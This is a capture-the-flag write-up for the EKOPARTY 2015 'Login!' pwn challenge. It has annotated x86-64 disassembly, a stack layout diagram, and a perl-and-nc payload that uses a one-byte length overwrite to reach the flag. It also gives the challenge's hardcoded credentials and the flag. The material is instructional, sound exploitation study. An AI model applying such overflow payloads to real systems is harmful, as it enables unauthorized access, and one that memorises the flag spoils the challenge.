English [EKOPARTY PRE-CTF 2015] [Pwn50 – Login!] Write Up

Description

 

Description: Are you admin?
nc challs.ctf.site 20000

Attachment: pwn50

Resolution

Ok we first disassembled the file, this is the commented result (addresses were removed for more readability):

<+0>:     push   rbp
<+1>:     mov    rbp,rsp
<+4>:     push   rbx
<+5>:     sub    rsp,0xe8
<+12>:    mov    DWORD PTR [rbp-0xe4],edi
<+18>:    mov    QWORD PTR [rbp-0xf0],rsi
<+25>:    mov    rax,QWORD PTR fs:0x28
<+34>:    mov    QWORD PTR [rbp-0x18],rax
<+38>:    xor    eax,eax
<+40>:    mov    DWORD PTR [rbp-0xdc],0x0
<+50>:    mov    esi,0x400a04
<+55>:    mov    edi,0x400a06
<+60>:    call   0x4006a0 <fopen@plt>             ; fopen("flag.txt", "r")
<+65>:    mov    QWORD PTR [rbp-0xd8],rax
<+72>:    cmp    QWORD PTR [rbp-0xd8],0x0
<+80>:    je     0x400947 <main+426>              ; if fopen() failed goto end

<+86>:    mov    rdx,QWORD PTR [rbp-0xd8]         
<+93>:    lea    rax,[rbp-0xa0]                   ; flag
<+100>:   mov    esi,0x20
<+105>:   mov    rdi,rax
<+108>:   call   0x400670 <fgets@plt>             ; fgets(&flag, flag)
<+113>:   mov    rax,QWORD PTR [rbp-0xd8]
<+120>:   mov    rdi,rax
<+123>:   call   0x400620 <fclose@plt>            ; fclose()
<+128>:   lea    rdx,[rbp-0xd0]
<+135>:   mov    eax,0x0
<+140>:   mov    ecx,0x5
<+145>:   mov    rdi,rdx
<+148>:   rep stos QWORD PTR es:[rdi],rax
<+151>:   mov    rdx,rdi
<+154>:   mov    DWORD PTR [rdx],eax
<+156>:   add    rdx,0x4
<+160>:   mov    DWORD PTR [rbp-0xd0],0x11        ; username_size
<+170>:   mov    DWORD PTR [rbp-0xbc],0x10        ; password_size
<+180>:   mov    DWORD PTR [rbp-0xa8],0x0
<+190>:   mov    edi,0x400a0f
<+195>:   mov    eax,0x0
<+200>:   call   0x400640 <printf@plt>            ; printf("User :")
<+205>:   mov    edi,0x0
<+210>:   call   0x400690 <fflush@plt>
<+215>:   mov    eax,DWORD PTR [rbp-0xd0]
<+221>:   cdqe   
<+223>:   lea    rdx,[rbp-0xd0]                   ; rdx = 0x7fffffffdd80 -> 0x11
<+230>:   lea    rcx,[rdx+0x4]                    ; rcx = 0x7fffffffdd84
<+234>:   mov    rdx,rax                          ; rdx = 0x11
<+237>:   mov    rsi,rcx                          ; rsi = 0x7fffffffdd84
<+240>:   mov    edi,0x0                          ; rdi = 0x00
<+245>:   call   0x400650 <read@plt>              ; read(0, 0x7fffffffdd84, 17)
<+250>:   mov    edi,0x400a17
<+255>:   mov    eax,0x0
<+260>:   call   0x400640 <printf@plt>            ; printf("Password :")
<+265>:   mov    edi,0x0
<+270>:   call   0x400690 <fflush@plt>
<+275>:   mov    eax,DWORD PTR [rbp-0xbc]
<+281>:   cdqe   
<+283>:   lea    rdx,[rbp-0xd0]
<+290>:   lea    rcx,[rdx+0x18]
<+294>:   mov    rdx,rax
<+297>:   mov    rsi,rcx
<+300>:   mov    edi,0x0
<+305>:   call   0x400650 <read@plt>              ; read(0, 0x00000000004008ce, 16)
<+310>:   lea    rax,[rbp-0xd0]
<+317>:   add    rax,0x4
<+321>:   mov    edx,0x6
<+326>:   mov    esi,0x400a23                     ; "charly";
<+331>:   mov    rdi,rax
<+334>:   call   0x400600 <strncmp@plt>           ; strncmp(username, "charly", 6)
<+339>:   test   eax,eax
<+341>:   jne    0x400945 <main+424>

<+343>:   lea    rax,[rbp-0xd0]
<+350>:   add    rax,0x18
<+354>:   mov    edx,0x8
<+359>:   mov    esi,0x400a2a                     ; "h4ckTH1s"
<+364>:   mov    rdi,rax
<+367>:   call   0x400600 <strncmp@plt>           ; strncmp(password, "h4ckTH1s", 8)
<+372>:   test   eax,eax
<+374>:   jne    0x400945 <main+424>

<+376>:   mov    edi,0x400a33      
<+381>:   call   0x400610 <puts@plt>              ; puts("Welcome guest")
<+386>:   mov    eax,DWORD PTR [rbp-0xa8]
<+392>:   cmp    eax,0x1                          ; TODO !
<+395>:   jne    0x400945 <main+424>
<+397>:   lea    rax,[rbp-0xa0]                   ; flag
<+404>:   mov    rsi,rax
<+407>:   mov    edi,0x400a42
<+412>:   mov    eax,0x0
<+417>:   call   0x400640 <printf@plt>            ; printf(flag)
<+422>:   jmp    0x400951 <main+436>
<+424>:   jmp    0x400951 <main+436>

<+426>:   mov    edi,0x400a55
<+431>:   call   0x400610 <puts@plt>              ; puts("Error leyendo datos") // Error reading data

<+436>:   mov    eax,0x0
<+441>:   mov    rbx,QWORD PTR [rbp-0x18]
<+445>:   xor    rbx,QWORD PTR fs:0x28
<+454>:   je     0x40096a <main+461>
<+456>:   call   0x400630 <__stack_chk_fail@plt>
<+461>:   add    rsp,0xe8
<+468>:   pop    rbx
<+469>:   pop    rbp
<+470>:   ret

 

Ok, let’s see what’s going on here. The file flag.txt is opened, and its content is saved in ebp-0xa0.

Then at lines +160 and +170 are stored username and password sizes. We are then asked for our username and our password.

Our first 6 bytes of the username is compared to charly and our 8 first bytes of the password is compared to h4ckTH1s. If it’s correct, it prints Welcome guest. Then rbp-0xa8 is compared to 1. If it’s true, flag is printed, else it exists.

Our goal is to write 1 at rbp-0xa8

Let’s see our stack at this point :

+------------+
|  size_user | RBP - 0xd0
+------------+
|            |
+------------+
|   myUser\n | RBP - 0xcc
+------------+
|            |
+------------+
|  size_pass | RBP - 0xbc 
+------------+
|            |
+------------+
|   myPass\n | RBP - 0xb8
+------------+
|            |
+------------+
|  00000000  | RBP - 0xa8
+------------+
|            |
|            |
|            |
|            | RBP = 0x7fffffffde50
+------------+

This is what the stack looks like, given every information of our disassembled binary.

We can see that rbp-0xa8 is right after our password. Since our password must be 0x10 long, our null byte termination will overwrite  rbp-0xa8  but it will still be 0x00, instead of 0x01.

Our username size limit is 0x11 though, and size_pass is stored 0x10 bytes after our username buffer. So we can overwrite size_pass with the 11th byte of our user ! We will overwrite it with 0x11 instead of 0x10.

One more byte is enough, this byte will be 0x01 to overwrite rbp-0xa8. This is what it looks like :

$ perl -e 'print "charlyaaaaaaaaaa\x11" . "h4ckTH1saaaaaaaa\x01"' > in.txt
$ nc challs.ctf.site 20000 < in.txt
User : Password : Welcome guest!
Your flag is : EKO{Back_to_r00000ooooo00000tS}

This is it, here is our flag

EKO{Back_to_r00000ooooo00000tS}

Leave a Reply

Your email address will not be published. Required fields are marked *